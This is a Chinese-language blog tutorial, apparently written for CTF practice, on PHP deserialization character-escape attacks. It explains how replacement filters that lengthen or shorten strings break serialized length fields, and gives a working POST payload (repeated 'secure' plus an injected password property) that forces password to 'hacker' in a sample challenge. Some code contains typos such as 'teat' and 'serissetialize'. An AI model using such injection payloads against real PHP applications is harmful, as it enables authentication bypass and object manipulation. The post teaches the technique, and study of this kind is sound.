PHP反序列化字符逃逸

最新推荐文章于 2024-03-08 12:19:43 发布
最新推荐文章于 2024-03-08 12:19:43 发布
阅读量201 收藏 1
点赞数 1
分类专栏: 常见漏洞 CTF常用方法技巧 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52923241/article/details/117692066
版权

序列化和反序列化

  • serialize():将对象转换成字符串

  • unserialize():将字符串转换成对象

  • str_replace():以其他字符替换字符串中的一些字符(区分大小写)

  • preg_replace():执行一个正则表达式的搜索和替换

  • 特点:

    • PHP在反序列化时,底层代码是以;作为字段的分隔,以}作为结尾;并且根据长度判断内容
    • 当序列化的长度不对应时会发生报错
    • 可以反序列化类中不存在的元素

  • Object(O): O:<class_name_length>:"<class_name>":<number_of_properties>:{<properties>}
    Boolean(b): b:value;(0或1)
    double(d)
    integer(i): i:value;
    array(a): a:<length>:{key,keyvalue}
    string(s): s:<length>:value;
    null(N)

  • eg:

    <?php
	class teat
	{
		public $a = "111";
		public $b = "222";
	}
	$test = new test;
	$data = serialize($test);
	echo $data;
?>

    序列化结果:O:4:"test":2{s:1:"a";s:3:"111";s:1:"b";s:3:"222";}

反序列化字符逃逸

  • 本质:闭合

  • 字符变多
    直接套下面模板即可

    <?php
	//过滤函数
	function filter($string)
	{
		$filter = '/p/i';
		//正则匹配,表示变量string中的p(由filter决定)会被替换成WW
		return preg_replace($filter,'WW',$string);
	}
 	$username = 'purplet';
 	$age = "20";
 	$user = array($username,$age);//数组
 	//序列化后的数值输出
	var_dump(serialize($user));
	echo "<pre>";//分隔符
	//序列化过滤后的数值赋值给r并输出
	$r = filter(serialize($user));
	var_dump($r);
	//对 序列化过滤后的数值  反序列化
	var_dump(unserialize($r));
?>

  • 字符变少

    <?php
	//正则函数,将string中的pp替换为w
	function filter($string){
		return str_replace('pp','W',$string);
	}
	$username = 'pppppppppppppppppppppppppp';
	$age = 'A";i:1;s:2:"20";}';
	$user = array($username,$age);
	//将user序列化然后输出
	var_dump(serialize($user));
	//分隔符
	echo "<pre>";
	$r = filter(serialize($user));
	var_dump($r);
	var_dump(unserialize($r));
?>

    string(73) "a:2:{i:0;s:26:"pppppppppppppppppppppppppp";i:1;s:17:"A";i:1;s:2:"20";}";}"

string(60) "a:2:{i:0;s:26:"WWWWWWWWWWWWW";i:1;s:17:"A";i:1;s:2:"20";}";}"
array(2) {
  [0]=>
  string(26) "WWWWWWWWWWWWW";i:1;s:17:"A"
  [1]=>
  string(2) "20"
}

  • 漏洞利用

    <?php
    include_once 'flag.php';
    highlight_file(__FILE__);//高亮函数
    // Security filtering function
    function filter($str){
    	//把str变量里的secure替换成secured
        return str_replace('secure', 'secured', $str);
    }
    class Hacker{
        public $username = 'margin';
        public $password = 'margin123';
    }
    $h = new Hacker();
    //isset()函数用于检测变量是否已设置并且非 NULL。
    //如果post传参后的username和password都有值时
    if (isset($_POST['username']) && isset($_POST['password'])){
        // Security filtering
        //把传参的username的这赋给username,此时password的值仍是margin123
        $h->username = $_POST['username'];
        //将h的值先序列化,再正则替换,然后反序列化,最后将值赋给c
        $c = unserialize(filter(serissetialize($h)));
        //如果c的password=hacker,则输出flag
        if ($c->password === 'hacker'){
            echo $flag;
        }
    }

    思路:想要输出flag,password的值就得为hacker;但是这里的可控变量只有username,所以要想办法构造一个值,使他最后的password=hacker,而且传参时,username和password都得有值才可执行。此时用post方式传参,将username=securesecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecure";s:8:"password";s:6:"hacker";}&password=1传给username
    用以下代码验证一下

    <?php
		//过滤函数
		function filter($string)
		{
			return str_replace('secure','secured',$string);
		}
	 	$username = 'securesecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecure";s:8:"password";s:6:"hacker";}';
	 	$password = 'a';
	 	$user = array($username,$password);//数组
	 	//序列化后的数值输出
		var_dump(serialize($user));
		echo "<pre>";//分隔符
		//序列化过滤后的数值赋值给r并输出
		$r = filter(serialize($user));
		var_dump($r);
		//对 序列化过滤后的数值  反序列化
		var_dump(unserialize($r));
	?>

    最后的结果为

    string(248) "a:2:{i:0;s:217:"securesecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecuresecure";s:8:"password";s:6:"hacker";}";i:1;s:1:"a";}"

string(279) "a:2:{i:0;s:217:"securedsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecured";s:8:"password";s:6:"hacker";}";i:1;s:1:"a";}"
array(2) {
  [0]=>
  string(217) "securedsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecuredsecured"
  ["password"]=>
  string(6) "hacker"
}
吃_早餐
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
PHP反序列化入门手把手详解
顶峰
02-08 1848
php
浅谈PHP反序列化字符逃逸
lonmar的博客
12-13 764
本文目录前言0x01 序列化和反序列化serialize()unserialize()0x02 字符逃逸字符变多字符减少总结 前言 最近遇到了这个知识点,网上找了好几篇这方面的好像都不太仔细,自己来总结下 0x01 序列化和反序列化 serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字 如下面的: <?php class people{ public $nam
PHP反序列化
m0_62451321的博客
11-07 5655
POP即:面向属性编程(Property-Oriented Programing)常用于上层语言构造特定调用链的方法,是从现有运行 些工作了。一般的序列化攻击都在PHP魔术方法中出现可利用的漏洞,因为自动调用触发漏洞,但如果关键代码没在魔术方法中,而是在一个类的普通方法中。这时候就可以通过构造POP链寻找相同的函数名将类的属性和敏感函数的属性联系起来。(1)先要确定起点和终点,如果起点有多个,那么就去尝试最有可能进行相互跳转的一个,起点和终点无法确定,POP链不可能成功。
原理+实践掌握(PHP反序列化和Session反序列化)
bylfsj的博客
03-22 1700
<p></p><h2 id="toc-0">前言:</h2> 最近又接触了几道php反序列化的题目,觉得对反序列化的理解又加深了一点,这次就在之前的学习的基础上进行补充。 0x00:PHP序列化 函数 : serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表...
浅析php反序列化字符逃逸
Lemon's blog
08-26 3050
前言: php反序列化字符逃逸之前没有详细的学习过,所以遇到题目看的有点懵,这次好好学习一下。 反序列化的特点 首先要了解一下反序列化的一些特点: php反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾,并且是根据长度判断内容的 ,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。 class A{ public $name='shy'; public $pass='123456'; } $lemon = new A(); echo serialize
php反序列化逃逸1
08-03
}结束,后的字符串不影响正常的反序列化php反序列化逃逸知识点 - 属性逃逸般在数据先经过次 serialize 再经过 unserialize,在这个中间反序
PHP反序列化漏洞详解.rar
02-07
在IT安全领域,PHP反序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
php反序列化长度变化尾部字符逃逸(0CTF-2016-piapiapia)
10-15
PHP反序列化长度变化尾部字符逃逸】是一种安全漏洞利用技术,通常出现在使用PHP的系统中。在PHP中,对象序列化是将对象转换为可存储或传输的字符串的过程,而反序列化则是将这个字符串恢复为原始对象的过程。...
shiro反序列化测试工具.zip
06-04
在网络安全领域,"反序列化漏洞"是一种常见的安全问题,攻击者可以通过构造恶意的序列化数据来执行远程代码或者获取敏感信息。Shiro框架在处理用户认证和授权时可能会涉及对象的序列化和反序列化,因此也可能存在...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
PHP序列化和反序列化
qq_31088019的博客
08-25 4148
PHP序列化和反序列化及案例
PHP反序列化详解(一)——反序列化基础
永远是少年
12-19 664
今天继续给大家介绍渗透测试相关知识,本文主要内容是PHP反序列化详解(一)——反序列化基础。 一、反序列化概念 二、PHP反序列化实现 三、PHP反序列化结果解析
php反序列化-字符逃逸看这一篇就够了
最新发布
cike_y
03-08 958
php反序列化字符逃逸-缩短逃逸、增长逃逸
php序列化和反序列化
qq_63501912的博客
02-07 1185
php的序列化和反序列化
PHP序列化,反序列化
kuzemax的博客
08-07 854
反序列化常用于上层语言构造特定调用链的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用链,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的 " gadget " 找到漏洞点。
LDAP注入
m0_52923241的博客
09-25 3806
LDAP注入漏洞简介LDAP语法漏洞原理AND注入OR注入LDAP盲注漏洞利用漏洞防御 漏洞简介 轻型目录访问协议(英文:Lightweight Directory Access Protocol,缩写:LDAP)。LDAP是一种通讯协议,LDAP支持TCP/IP。可以说LDAP类似于mysql数据库,用来存储目录。 LDAP就是一个类似于“目录服务”的特殊数据库,用来保存描述性的、基于属性的详细信息,支持过滤功能。它是动态的,灵活的,易扩展的。类似于:人员组织管理,电话簿,地址簿…等等。ldap 可能内网
fastjson反序列化字符串数组
03-03
下面是一个示例代码,演示了如何使用Fastjson反序列化字符串数组: ```java import com.alibaba.fastjson.JSON; public class Main { public static void main(String[] args) { String jsonString = "[\"string...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吃_早餐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值